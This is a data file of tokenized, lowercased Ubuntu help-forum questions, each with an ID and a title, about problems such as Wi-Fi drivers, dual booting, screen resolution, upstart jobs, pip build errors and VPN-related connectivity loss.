247757	how do you find the licenses for everything installed on your system ?	i want to write a script that outputs the license for every software package installed on my system . using dpkg -- get-selections i am able to get list of everything installed . however , i do n't see a way to get the license information for each package . for example , i can use aptitude show to get the properties of each package , but that does not include the license : $ aptitude show apache2 package : apache2 state : installed automatically installed : no version : 2.2.14-5ubuntu8.6 priority : optional section : httpd maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > uncompressed size : 36.9k depends : apache2-mpm-worker ( = 2.2.14-5ubuntu8.6 ) | apache2-mpm-prefork ( = 2.2.14-5ubuntu8.6 ) | apache2-mpm-event ( = 2.2.14-5ubuntu8.6 ) | apache2-mpm-itk ( = 2.2.14-5ubuntu8.6 ) , apache2.2-common ( = 2.2.14-5ubuntu8.6 ) provided by : apache2-mpm-event , apache2-mpm-itk , apache2-mpm-prefork , apache2-mpm-worker description : apache http server metapackage the apache software foundation 's goal is to build a secure , efficient and extensible http server as standards-compliant open source software . the result has long been the number one web server on the internet . it features support for https , virtual hosting , cgi , ssi , ipv6 , easy scripting and database integration , request/response filtering , many flexible authentication schemes , and more . homepage : http : //httpd.apache.org/ is there a third-party repository that correlates the license to each package ? it sounds painful to download every source package and inspect it for licensing information , but maybe that 's the best way .
247759	unable to launch update manager	could not initialize the package information . an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse )
247760	ubuntu 12.10 will only connect through ethernet	i recently installed ubuntu 12.10 on a friend 's laptop but i 'm having trouble getting it to work with his router wireless . i can connect to the internet and use it fine with an ethernet connection , but the many wireless connections i have attempted to set up all display their 'last used ' as 'never.. ' i 'm not sure what information/images will be needed to either downgrade to a working version or get the current version to connect . timothy @ timothy-mx6446 : ~ $ lspci 00:00.0 host bridge : advanced micro devices [ amd ] nee ati rs480 host bridge ( rev 10 ) 00:01.0 pci bridge : advanced micro devices [ amd ] nee ati rs480 pci bridge 00:04.0 pci bridge : advanced micro devices [ amd ] nee ati rs480 pci bridge 00:05.0 pci bridge : advanced micro devices [ amd ] nee ati rs480 pci bridge 00:13.0 usb controller : advanced micro devices [ amd ] nee ati ixp sb400 usb host controller ( rev 80 ) 00:13.1 usb controller : advanced micro devices [ amd ] nee ati ixp sb400 usb host controller ( rev 80 ) 00:13.2 usb controller : advanced micro devices [ amd ] nee ati ixp sb400 usb2 host controller ( rev 80 ) 00:14.0 smbus : advanced micro devices [ amd ] nee ati ixp sb400 smbus controller ( rev 83 ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati ixp sb400 ide controller ( rev 80 ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati ixp sb4x0 high definition audio controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati ixp sb400 pci-isa bridge ( rev 80 ) 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati ixp sb400 pci-pci bridge ( rev 80 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs482 [ radeon xpress 200m ] 02:00.0 ethernet controller : marvell technology group ltd. 88e8038 pci-e fast ethernet controller ( rev 14 ) 05:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) 08:09.0 cardbus bridge : texas instruments pcixx12 cardbus controller 08:09.1 firewire ( ieee 1394 ) : texas instruments pcixx12 ohci compliant ieee 1394 host controller 08:09.2 mass storage controller : texas instruments 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) timothy @ timothy-mx6446 : ~ $ timothy @ timothy-mx6446 : ~ $ sudo usage : sudo [ -d level ] -h | -k | -k | -v usage : sudo -v [ -akns ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] usage : sudo -l [ l ] [ -akns ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name ] [ -u user name| # uid ] [ -g groupname| # gid ] [ command ] usage : sudo [ -abehknps ] [ -r role ] [ -t type ] [ -c fd ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] [ -g groupname| # gid ] [ var=value ] [ -i|-s ] [ < command > ] usage : sudo -e [ -akns ] [ -r role ] [ -t type ] [ -c fd ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] file ... timothy @ timothy-mx6446 : ~ $ timothy @ timothy-mx6446 : ~ $ lshw -c network warning : you should run this program as super-user . lshw -c network *-network description : ethernet interface product : 88e8038 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 14 serial : 00 : e0 : b8 : b9:22:76 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full ip=192.168.0.110 latency=0 multicast=yes port=twisted pair speed=100mbit/s resources : irq:16 memory : c0200000-c0203fff ioport : a000 ( size=256 ) *-network unclaimed description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:05:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : memory : c0300000-c0303fff warning : output may be incomplete or inaccurate , you should run this program as super-user . timothy @ timothy-mx6446 : ~ $ lshw -c network warning : you should run this program as super-user . pci ( sysfs ) hopefully this helps .
247763	why is my sssd.conf file missing after installing sssd ?	i 'm new to linux and decided to play around with building a server to learn more . i have been following the following guide : http : //www.danbishop.org/2012/06/02/ubuntu-12-04-ultimate-server-guide/ everything has been going well . i have a functioning kerberos realm , and dns and dhcp are working great . but , i installed sssd and i have no /etc/sssd/sssd.conf file . i noticed when sssd was installing it showed setting up sssd ( 1.8.2-0ubuntu1 ) … start : job failed to start invoke-rc.d : initscript sssd , action “start” failed . … because /etc/sssd/sssd.conf is not available yet setting up libpam-sss ( 1.8.2-0ubuntu1 ) … any thoughts as to why i do n't have an /etc/sssd/sssd.conf file ? i did find a /etc/init/sssd.conf file . but , that does n't appear to be what i need . i 'm running ubuntu 12.04 server . i must be missing something . thank you
247766	what are the consequences of ignoring the updates completely ?	i have here in my launcher bar an icon which states that there are currently 418 available updates . now i think people will appreciate that a that 's a lot of updates and b it is not likely that an average user such as myself would know what most of these things do . my basic fear is that by installing some of these updates , it is going to adversely affect things that are already running fine . i have already seen this happen with installing packages for latex in ubuntu . so why not just leave well enough alone and ignore the updates ? are there a few that would be particularly important that i should be aware of ?
247768	run python script on reboot ( boot )	i am trying to run a script once the server reboots . so , how can i change it . my script needs only one file to open and it opens in terminal . i read something about changing configurations or cronjobs , but how exactly to change it ? i want to do that because if i close the terminal obvious the script stops , so if i make it start on reboot it will work 24/7 i guess . what i do now is , open openssh , connect to my server , run the script , but when i close the session the script stops working , so i 'm trying to make it permanently . thanks ! version : ubuntu 10.04 lts .
247772	create a separate partition like d : \ ( of windows ) in ubuntu	i 've decided to make a complete switch to ubuntu.. my thing is , in windows if the os crashes ( which happens very often ) all the data in drives d : \ , e : \ etc. , will be safe . i format the c : \get the new os there again . how do i achieve the same functionality in ubuntu . please shed some light : )
247775	netbook can not shutdown in ubuntu 12.10	why my netbook ( with ubuntu 12.10 ) can not do shutdown after i click shutdown feature on desktop tool bar . my netbook enter into new session after i click shutdown , rather than off . to shutdown my netbook , i forced to do it in harsh way : press on/off button . what 's the problem actually ? and what is the solution ? btw , before this problem happen , i added a new user in my netbook . is there any correlation to my netbook shutdown problem ? thanks for any help . regards , aswin simatupang
247776	ubuntu 12.10 can not detect windows 8 in uefi mode when installing	i 've installed windows 8 64 bit on uefi . now i want to install ubuntu 12.10 on uefi too . i used a usb flash drive to boot in uefi mode and started install , but in `` installation type '' screen , it was unable to detect any os . i tried ubuntu without installing it and : 1 . in uefi boot mode , i can not mount any partition . 2 . in legacy boot mode , i can mount all partitions . windows 8 os partition is primary partition . thank you in advance !
247780	failed getting dual boot with windows 7 and ubuntu 12.10 , 64bit	i 'm very new to linux and ubuntu so i 'm not very technical able in ubuntu . i have windows 7 already installed . for a few weeks i booted ubuntu 12.10 , 64bit with a liveusb . i was able to save items with persistent memory . the liveusb and persistent memory worked well . from the lifeusb i did a dual boot install . i step through the default settings and i did not do anything very technical . i have a usb 2.0 hard disk drive connected to a usb 2.0 port . by default the space partitioning and install went to the usb hdd and not to my pc 's drive . the default install chose this external usb 2.0 drive . windows 7 is able to recognize it 's part of the usb hdd when i 'm in windows 7 and does n't see ubuntu 's partition which seem correct . here is the problem . when i boot my pc , there is no automatic choice on what os to boot up in . so i boot into my bios and choose what appears to be the usb hdd ( it 's a odd name ) . i get a choice to boot in ubuntu , ubuntu safe mode , and a few others . when i boot into ubuntu i get a blank screen for a long time . then i get some error text messages . i 'm not sure why this is happening , but imho it appears that the ubuntu boot up can not see the usb hdd . here are some of the error messages : '' gave up waiting for root drive boot args ( cat/proc/cmdline ) -check roog delay= ( did the system wait long enough ) -check root= ( did the syttem wait for the right device ) . by default , my pc automatically boots in windows 7 ok . but i ca n't get ubuntu to boot . any suggestions ? ideas ? fixes ? thanks you .
247784	is there any way of data recovery . my hard drive is formatted	i recently installed ubuntu 12 on my system but during installation it deleted all my partitions and made only one partition in which ubuntu is installed . i want to recover my data . please help me because i really need that data
247797	how to fix totem 's `` invalid commandline '' error ?	whenever i attempt to play a video ( or an audio file ) with totem i get the following error : totem invalid commandline the parameters passed to the application had an invalid format . please file a bug ! the parameters were : -- transient-for=75497483 gstreamer|1.0|totem|h.264 decoder|decoder-video/x-h264 , level= ( string ) 3 , profile= ( string ) high , stream-format= ( string ) avc , alignment= ( string ) au , parsed= ( boolean ) true i 've added the gnome3 team 's ppa if that matters .
247799	gm-notify and pidgin do n't autostart	i quite recently upgraded from 10.04 to 12.04 so i 'm still adjusting to the switch from gnome to unity . one new thing is the way i get notifications from gmail and pidgin . i 've got it working so that they are both available via the little e-mail icon by the clock . however , they do n't automatically activate upon login . in order to get notifications from gmail i have to manually klick it once to start the underlying application . ! after i 've clicked it i get another row with the inbox status . the same is more or less true for pidgin , it got no extra status line , but the application starts the first time i click it rather than autmatically when i login . so the question finally is how i get these to auto-start ? i guess i could add pidgin to 'startup applications ' , but then it 'll pop-up every time i log in , i 'd like it to start minimized .
247804	disable wireless if wired connection available in xbmc	my htpc has a wireless and a wired connection . when i start ubuntu both get an ip-adress . i do n't see any inherent problem with this , but xbmc seems to default to the wireless , even if the wired is available . how can i force precedence of the wired connection above the wireless ? i 'm not looking to shutdown/disable the wireless : i do use both , but not at the same time per se . there should n't be any interaction for this , as i do n't have a keyboard connected . currently i ssh to the box to shut down wireless manually if needed , but that 's ridiculous : ) basically what i expected was that when the wired connection gets an ip , the wireless releases it 's connection , and as soon as the wired ip is gone , wireless comes in again . but that does n't seem to happen : (
247807	run program from a shell script but behave as one process only ?	is there a way i can execute an application from a shell script but not create another process . i want it to look like one process only . it does n't matter whether my shell script is replaced by a new process or whether it will continue after a called application ends . this should also solve my previous question : is there a way to associate additional application launcher with an app ? thank you very much for your help .
247814	problem with smb-shares in nautilus	i have major problem with smb-shares in nautilus . when i try to copy large files it stops working after a few minuts . sometimes i get a error message to check my internet connection but often i do n't get any error messages at all . when i use smbget in the terminal everything works fine and i can copy files in about 5mb/s ... any idea if i can make things better in nautilus ?
247815	ubuntu 12.1 ca n't list [ my ] wifi modem	i 've changed my wifi modem , old one is linksys new one is airties . ubuntu listed my ex wifi modem on the wireless list , but it has n't listed my new wifi modem . it still shows other wireless modem , but not mine . i set up my modem with same security methods . my nic is qualcomm atheros ar9285 . i could connect my old modem . can you help me ?
247819	getting active pastable locations in the current session ?	well i was trying to implement a feature which could do away with the selectall-copy-paste option in the text editor kwrite . i was trying to get all the pastable locations such as ( current open documents , web browser widgets etc . ) is there a way to compile a list of all such locations . so that i just select an option from the list and then simply with the press of a button the text gets transferred to the desired location ?
247820	how can i select the 1366x768 resolution for ubuntu in vmware player ?	running ubuntu 12.10 on vmware player 5.0.1 build-894247 . i have installed the vmware tools and can choose the resolution 800x600 and up to 2560x1600 . so i have a fair amount of resolutions to choose from . but my laptops native resolution , and the one that windows 7 is running on , is 1366x768 . why ca n't i get that resolution in ubuntu on vmware ? those 3 extra pixels on each side is very annoying - especially when the mouse pointer moves there and directs the input outside ubuntu . is there any way to edit the resolutions i can choose from in ubuntu ?
247821	how can i dual boot with an asus g55vw ?	i just bought a new asus g55vw rog notebook . i 'm trying to install ubuntu 12.04 lts alongside windows 8 without success . i tried several different things : i installed from windows using wubi . now in win boot loader i get win 8 and ubuntu but ubuntu wo n't load ( i get an black error screen about wubildr ) i tried installing ubuntu from a live-usb but ubuntu would n't load the desktop environment , just a command line . so i tried to install ubuntu without trying it before and the installer run `` smoothly '' ( with gui ) . after rebooting the pc , i get to the grub menu , and i have all the options : ubuntu , recovery , win 8 , etc . the problem is that ubuntu still wo n't load the desktop environment . i tried installing the nvidia-current drivers from the command line but it keeps complaining about held back packages and missing dependencies .
247822	upstart job not running at boot	hi all i have been trying to figure out my problem for some time and think it is now time to ask someone who know more than me . hopefully this is only a simple solution for someone in the know basically i have 2 upstart scripts that i created but only 1 will run at boot and the other will not although both run fine when called manually here is the one that works # status led daemon # description `` status led daemon ; used for controlling the server status led '' author `` none '' start on ( started dbus and started mountall ) stop on ( xbmc-do-stop or runlevel [ ! 2345 ] ) exec led.sh respawn and here is the one that does not # irexec daemon # description `` irexec daemon '' author `` none '' start on ( started dbus and started mountall ) stop on ( xbmc-do-stop or runlevel [ ! 2345 ] ) exec irexec /home/pi/.lircrc respawn as you can see they are very similar and i can not find out why one will work but the other will not
247825	unable to dual boot windows 8	i 've tried to create a bootable usb using my windows 8 os . when i boot from the usb it brings me to a gns grub menu . its a black screen which tells me to try ubuntu or install , or to check for disc problems and something for manufacturers . i 've tried all of these but it just comes to a black screen and no ubuntu installation screen appears . the same usb works fine when tried to dual boot with windows 7 .
247827	how can i install the network security toolkit ( nst ) in ubuntu ?	how can i install nst in ubuntu ? i have searched but found nothing .
247831	problem with remapped key when changing between languages	i 've remapped a certain key ( ` to w ) with this way : xmodmap -e `` keycode 49 = w '' i use greek language , not only english and i change between languages with alt+shift . when i turn the keyboard layout to greek it should output a greek character that is assigned to w key at greek keyboards ( the character ς ) . it continues to output w when i turn the keyboard to greek . the name that is given to this greek character ( when i press w/ς key after xev at the terminal with the language turned to greek ) is greek_finalsmallsigma temporarily i did the following in order to output the greek character by pressing shift xmodmap -e `` keycode 49 = w greek_finalsmallsigma '' is there a way to change the output of that key when i change between greek and english with alt+shift ?
247834	how can i run .jar files with openjdk by default ?	here is the problem : i have to open a .jar file . when i try with right click and openjdk ... it works fine . if i try to choose a default application ( right click , properties , open with , other ... ) , neither oracle java 7 nor open jdk are in the list . the only thing that i can find is oracle java web start and it does n't work with it . so , why can the correct applications be found in the list with right click , open with and so on but not in the list shown in properties ? please , be very basic , as i 'm just a computer user , not an it specialist . by the way , i have ubuntu desktop 12.10 and i have installed oracle java 7 and open jdk 7 .
247836	how to add new screen dimension for xrandr selection ?	i 'm using the gpu in my i3-3225 processor , an ivy bridge processor . the pc is connected through a kvm switch to the display . when booting the pc with the display selected and on , i get the 1280x1024 resolution of my display . when booting with the display off or not selected on the port , i get a resolution of 1024x768 @ 61 khz . what can i do to get the 1280x1024 resolution ? i tried the xrandr recipe but i get the xrandr : configure crt 0 failed error . i know about the edid thing . could there be a way to save the current xorg configuration as to be used as default even if the display is not connected ? edit : additional information this is the output of xrandr -- verbose i get when the pc is booted with the display connected : $ xrandr -- verbose xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1280 x 1024 , maximum 1280 x 1024 default connected 1280x1024+0+0 ( 0x138 ) normal ( normal ) 0mm x 0mm identifier : 0x137 timestamp : 1212589 subpixel : no subpixels clones : crtc : 0 crtcs : 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : 1280x1024 ( 0x138 ) 0.0mhz *current h : width 1280 start 0 end 0 total 1280 skew 0 clock 0.0khz v : height 1024 start 0 end 0 total 1024 clock 0.0hz 1024x768 ( 0x139 ) 0.0mhz h : width 1024 start 0 end 0 total 1024 skew 0 clock 0.0khz v : height 768 start 0 end 0 total 768 clock 0.0hz 800x600 ( 0x13a ) 0.0mhz h : width 800 start 0 end 0 total 800 skew 0 clock 0.0khz v : height 600 start 0 end 0 total 600 clock 0.0hz 640x480 ( 0x13b ) 0.0mhz h : width 640 start 0 end 0 total 640 skew 0 clock 0.0khz v : height 480 start 0 end 0 total 480 clock 0.0hz this is the output of xrandr -- verbose i get when the pc is booted with the display is not connected : $ xrandr -- verbose xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 ( 0x138 ) normal ( normal ) 0mm x 0mm identifier : 0x137 timestamp : 4495 subpixel : unknown clones : crtc : 0 crtcs : 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : 1024x768 ( 0x138 ) 48.0mhz *current h : width 1024 start 0 end 0 total 1024 skew 0 clock 46.8khz v : height 768 start 0 end 0 total 768 clock 61.0hz 800x600 ( 0x139 ) 29.3mhz h : width 800 start 0 end 0 total 800 skew 0 clock 36.6khz v : height 600 start 0 end 0 total 600 clock 61.0hz 640x480 ( 0x13a ) 18.4mhz h : width 640 start 0 end 0 total 640 skew 0 clock 28.8khz v : height 480 start 0 end 0 total 480 clock 60.0hz
247840	missing icons on top panel , dashboard applications , launcher	so today i had trouble in an upgrade for ubuntu when i accidentally shut down my laptop . i was able to log in and reset everything but i noticed that the icons on the top right panel are missing ( network icon , volume , messages , even the icon launcher and my name ) . the only way i can switch off my device or even restart is by manually pressing the switch button of my laptop only the clock has stayed . i tried looking for my settings but when i searched my dash home , none of my applications appeared . no calculator , no terminal etc . the only results that i got were the files i had saved . my upgrade manager have also disappeared . i tried the unity reset command but nothing happened . instead , my google chrome icon on my left panel disappeared and similarly , i can not find it in my dash . i 'm quite the novice when it comes to ubuntu so any good step-by-step instructions would be greatly appreciated .
247841	how can i list the unused applications ?	hey is there any possibility to list out all the applications with a condition of unused for 10-20 days limit . if so how can i do that . thank you .
247845	i can not install python modules	when i try to use pip or easy_install i am getting following errors for any kind of modules i try to install . i ve looked for all the output errors but i dont understand th reason behind . searching for orange reading http : //pypi.python.org/simple/orange/ reading http : //orange.biolab.si reading http : //orange.biolab.si/svn/orange/trunk reading http : //orange.biolab.si/ reading https : //bitbucket.org/biolab/orange/downloads best match : orange 2.6 downloading http : //pypi.python.org/packages/source/o/orange/orange-2.6.tar.gz # md5=7c8e4636cc02984a1bb58c3cd45a5d45 processing orange-2.6.tar.gz writing /tmp/easy_install-x9yvwi/orange-2.6/setup.cfg running orange-2.6/setup.py -q bdist_egg -- dist-dir /tmp/easy_install-x9yvwi/orange-2.6/egg-dist-tmp-rhpykh warning : ca n't read registry to find the necessary compiler setting make sure that python modules _winreg , win32api or win32con are installed . warning : no previously-included files matching '* ' found under directory 'source/orangeqt/build' no previously-included directories found matching 'source/orange/px' no previously-included directories found matching 'source/orange/ppp' no previously-included directories found matching 'source/orangeom/px' no previously-included directories found matching 'source/orangene/ppp' no previously-included directories found matching 'source/orangene/px' no previously-included directories found matching 'source/orangene/ppp' warning : no previously-included files found matching 'source/orangeom/lib_vectors.cpp' warning : no previously-included files found matching 'source/orangene/lib_vectors.cpp' cc1plus : warning : command line option `` -wstrict-prototypes '' is valid for ada/c/objc but not for c++ cc1plus : warning : command line option `` -wstrict-prototypes '' is valid for ada/c/objc but not for c++ in file included from source/include/stat.cpp:24 : source/include/stat.hpp : in function ‘t moment ( const std : :vector < t , std : :allocator < _tp1 > > & , const int & ) ’ : source/include/stat.hpp:418 : warning : suggest explicit braces to avoid ambiguous ‘else’ source/include/stat.hpp : in function ‘t loess_y ( const t & , std : :map < t , u , std : :less < _key > , std : :allocator < std : :pair < const _key , _tp > > > , const float & ) ’ : source/include/stat.hpp:1415 : warning : suggest explicit braces to avoid ambiguous ‘else’ source/include/stat.cpp : in function ‘void samplingminimal ( const std : :map < double , double , std : :less < double > , std : :allocator < std : :pair < const double , double > > > & , int , std : :vector < double , std : :allocator < double > > & ) ’ : source/include/stat.cpp:85 : warning : comparison between signed and unsigned integer expressions cc1plus : warning : command line option `` -wstrict-prototypes '' is valid for ada/c/objc but not for c++ cc1plus : warning : command line option `` -wstrict-prototypes '' is valid for ada/c/objc but not for c++ cc1plus : warning : command line option `` -wstrict-prototypes '' is valid for ada/c/objc but not for c++ in file included from source/include/c2py.cpp:22 : source/include/c2py.hpp:25 : fatal error : python.h : no such file or directory compilation terminated . error : setup script exited with error : command 'gcc ' failed with exit status 1 this is a specific output for orange machine learning library with easy_install . pip also causes nearly same results . is there any one who sees the reason of the error ?
247848	how to install vagrant with manual virtualbox 4.2 ?	how can i install vagrant 1.0.6. with an already manually installed virtualbox 4.2.6 on ubuntu 12.04 ? all of my known ways fail : download *.deb file for 64bit and dpkg -- install vagrant_x86_64.deb gives me the error vagrant not installed . use apt-get install vagrant after using vagrant up . using apt-get install vagrant wants to remove ( ! ) my manual virtualbox installation . what to do ?
247850	is it possible to perform a clean install without losing software raid 5 data ?	i have a machine running 12.10 ( after upgrade from 12.04 which was a clean install ) . it has 3 1tb drives running software raid 5 ( each drive has a main , and swap partition . 3x main partitions are raided and mounted as / , 3x swap partitions are raided and mounted as swap ) . the raid is mounted at / ( so the entire os sits on the raid array ) . now since the upgrade , the system has become really funky , slow & slugish , and exhibits some problems when booting . i do n't have any custom configurations or settings i 'm afraid of losing , except for the data itself . is it possible to perform a clean install without losing data ? ( and if so , i asume using the alternative iso , please correct me if i 'm wrong ) i remember reading somewhere that a clean install in recent ubuntu version would not override files in /home/ during install , is this true ? should i move files i wish to preserve to /home/ ? can a clean install be performed on an existing array ? also , if there are any pit-falls i should consider/plan ahead for , i 'll be glad to know : )
247851	how can i migrate from asingle ubuntu install to ubuntu as a vm on win8 ?	i want to migrate from ubuntu 12.04 stand alone to ubuntu 12.04 as a virtual machine on a windows 8 host - preferably with virtualbox . what strategies can you propose to take over as much data and settings as possible ?
247853	why did i loose my internet connection after installing a vpn client ?	i installed the vpn client to connect to my company 's network , the cisco anyconnect ssl vpn client . everything went fine , i was able to install it correctly , connect to the server , was prompted for my username and password . then after i clicked on accept the terms and conditions , it looked like i was connected to the vpn for a few seconds , and then i got brutally disconnected from the vpn . that 's when i started having trouble . basically since then , i have not been able to access even the regular internet anymore at all ! the weird thing is that i still see myself as connected to my wireless network like always , but if i try to access any page with any browser it wo n't load because of a dns issue i would assume . i have tried restarting , killing any vpn process i would see , but this has n't solved my issue . note that i have another laptop in the same room using the same wireless , and accessing the network just fine . also , not sure if this is related or not , but since this vpn issue , when i restart the laptop i get a `` beep '' when it boots saying my battery and ac type is not recognized and that battery may not charge ( even though it seems to charge fine ) , is it something i should worry about ? i am using ubuntu 12.04 , i have no idea how to diagnose what 's wrong , so any help would be appreciated . at this point i do n't really care about the vpn anymore , i just want to get my regular connection back !
247857	boot from usb after ubunutu installed on macbook air	i installed ubuntu 12.10 on my macbook air , first gen , removing mac os x . the os has gotten really screwy since the battery died while installed os updates . so i wan na format the laptop and install ubuntu on it again . i tried booting the laptop and pressing alt to choose the bootable ubuntu 12.10 usb key , but not a single boot option appears . how can i boot into my usb key to reinstall ubuntu on the laptop ?
247858	why is unity not loading properly ?	i wanted to try out league of legends . i installed playonlinux and got lol working through it , but whenever i ran the game it changed my screen resolution to something a bit smaller than my screeen , i changed this back by pressing 'fn + f7 ' which has a screen change icon on my laptop on f7 . i do n't know what 's happened now , but whenever i turn my laptop off and on again , it loads with a black screen . i have to press 'fn + f7 ' every time , and then i just get my desktop loaded but nothing else , no bar at the top , not menu at the side , ctrl + alt + t works though and that is how i have been managing to get some things to work . i have tried reinstalling compiz and unity ( said `` package not found '' , so i installed it , but do n't really know what it did ; nothing changed ) . so at the moment , i used terminal to run 'startx ' as root and then run compiz and unity and it is almost normal again but i 'm logged in as root , not as me.. so my background is different , my docs are n't there etc . how can i make it back to normal ? i do n't really have time to reinstall ubuntu at the moment , and want to get back to 12.04 or 11.10 as 12.10 seems a bit unfinished . ( i am a bit of a noob at linux , i know basic commands and have been using it for a while )
247861	i ca n't turn on my bluetooth ?	ubuntu 12.04.01 - i ca n't turn on my bluetooth . i am on a dell vostro 1500 with wireless 355 bluetooth module ( bluetooth 2.0 + edr ) . when i turn the bluetooth on from the indicator and then click on bluetooth settings , it says the bluetooth is disabled . bluetooth is enabled in bios settings . is there a possible fix for this ? rfkill list output is as follows : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : dell-wifi : wireless lan soft blocked : no hard blocked : no 2 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no lsusb output for this device : bus 003 device 005 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) uname -r 3.2.0-37-generic i have tried : sudo su modprobe btusb lsmod | grep btusb to confirm module is loaded , then sh -c `` echo 0x0a5c 0x4500 > /sys/bus/usb/drivers/btusb/new_id '' nothing happens at all . hcitool dev returns no devices .
247862	how to install gimpshop/gimphoto in 12.04 ? ( and what to remove first )	here 's what i 've done : installed gimp removed gimp autoremoved gimp downloaded gimphoto .deb package i 'm new to installing things out of terminal/software center . what did i miss ? what should i really do ? or , maybe gimphoto/gimpshop ca n't be installed in 12.04 ?
247864	internet timeout or not loading webpages completely , however works in windows	i am running ubuntu 12.04 64bit at the moment , however , i have been experiencing the problem since about 11.04 . ( tried 32 and 64bit versions ) my problem is that when browsing the internet , pages really struggle to load . sometimes they load fast without any problem . other times , they time-out and i have to refresh the page a couple of times before the page loads . sometimes , even if the page starts loading , it does not load the entire page . for example , sometimes , it will not load css for a page and the entire page will just be plain html . other times , pictures and other embedded content fail to load . it has come to the point where i have installed a plug-in for firefox to auto refresh my pages . usually , it takes about 7 seconds of refreshing before the page starts loading , and thatâs if it completes the loading . sometimes , certain applications have similar symptoms . for example , when using apt-get in the terminal to install or update , it sometimes fail to connect to sources and i have to try again until it connects . here are some facts and things i have tried regarding the problem : i have no connection problems in windows . ( windows xp , windows vista , windows 7 ) using a different connection works without a problem . ( used a mobile 3g connection ) i have tried using different browsers . ( firefox , chromium ) i have tried a different network manager . ( wicd if i remember correctly ) i have set the time-out time to 100 . ( sudo sysctl net.ipv4.tcp_fin_timeout=100 ) my installation is up to date . i have no problem when downloading files . ( once a download starts , there is no problem . ) i have spoken to my isp and they said everything is fine from their side and besides , my internet works without any problem in windows . i would really like if it worked in ubuntu as it is my primary operating system , but you can understand how frustrating and unproductive it can be when your web pages times out all the time . please help . t.i.a . edit 1 : if that image is difficult to read , http : //i47.tinypic.com/2r5f22u.png http : //i46.tinypic.com/1zw2rgj.png http : //i48.tinypic.com/2ccml8j.png http : //i49.tinypic.com/j7yxw9.png edit 2 : http : //i47.tinypic.com/qx1mvc.png
247873	ubuntu does not detects the ram correctly	i have 512mb ram in my pc . ubuntu detects only 495 mib . how can i fix this ? on debian squeeze , i have 512mb . ( the correct size ) os : ubuntu 12.04 precise pangolin
247874	reassigning touch sensitive buttons	i have a lenovo z580 . it has touch sensitive buttons at the top as you can see in the picture . the mute , vol down and vol up buttons work properly in ubuntu . the other 2 do n't . the camera is used to activate dolby home theater in windows 7 and the other one ( moon like ) is used to control fan speed . is there a way i can reassign the other 2 buttons to execute a command which i choose ? btw vol up , vol down and mute are detected in xev but the other 2 are not .
247878	create an .svg screenshot	is there an application which can makes a .svg screenshot ?
247881	what is the command line equivalent for the update manager ?	when i do sudo apt-get update sudo apt-get upgrade sometimes the ubuntu gui update manager will still have some items left . e.g . âcomplete generic linuux kernelâ . i know there 's also sudo apt-get dist-upgrade , but that touches other things . my question is , what 's another command line option that i can use that 'd update the rest of items shown in gui update manager ( but does n't touch anything else extra ) . in other words , i am looking for command line equivalent .
247890	how to increase the default screen resolution without a monitor plugged in	i have kinda problem with setting my resolution on ubuntu 10.04 the thing is that i installed the machine and put it away without mouse , keyboard and monitor ( i am currently remote with vnc viewer ) now the problem is that without a monitor plugged in i can`t increase the screen resolution above 800x600 how can i increase it let`s say to 1024x768
247891	what does the percent of an update process represent	first look at the image : you can see from the image that the apt process is downloading the repository updates , the one at the moment is one that is 5.406 kb of size , to which the download as only gotten 1.831 kb which is 34 % of that package . at the far left , in the same line we can see the suppose `` total '' download percent , which shows 82 % . i would think that this is 82 % if the total packages needed to download , but then i would be mistaken . after downloading the package mentioned above , this 82 % instead of going up , might go down like 73 % . even if it get to 99 % does not mean it is 1 % from finishing . this 99 % could go down when downloading the following package . so since this left most percent does not actually stand for the total package percent , what does it stand for since it confuses me when waiting for a download or checking the downloads and seeing it get to 95 % , then back to 60 % , then up to 80 % , then down to 76 % and so on . so my questions are : where is the actual total percent which shows how much has been done and how much is left ? does adding 3rd party ppa ( xorg edgers , webup8 , xbmc ... ) influence in the correct check for the total percent ? why the abnormal jumps between percents where they go down instead of up ( eg from 85 % to 81 % )
247892	can i encrypt my disk after installing ?	i did not chose to encrypt the full disk when i installed ubuntu . can i do it now ?
247893	webcam image is flipped in skype	my webcam image on asus n61da laptop is flipped in skype . is working fine but flipped . also i ca n't push buttons in flash player for example to allow using my webcam and mic .
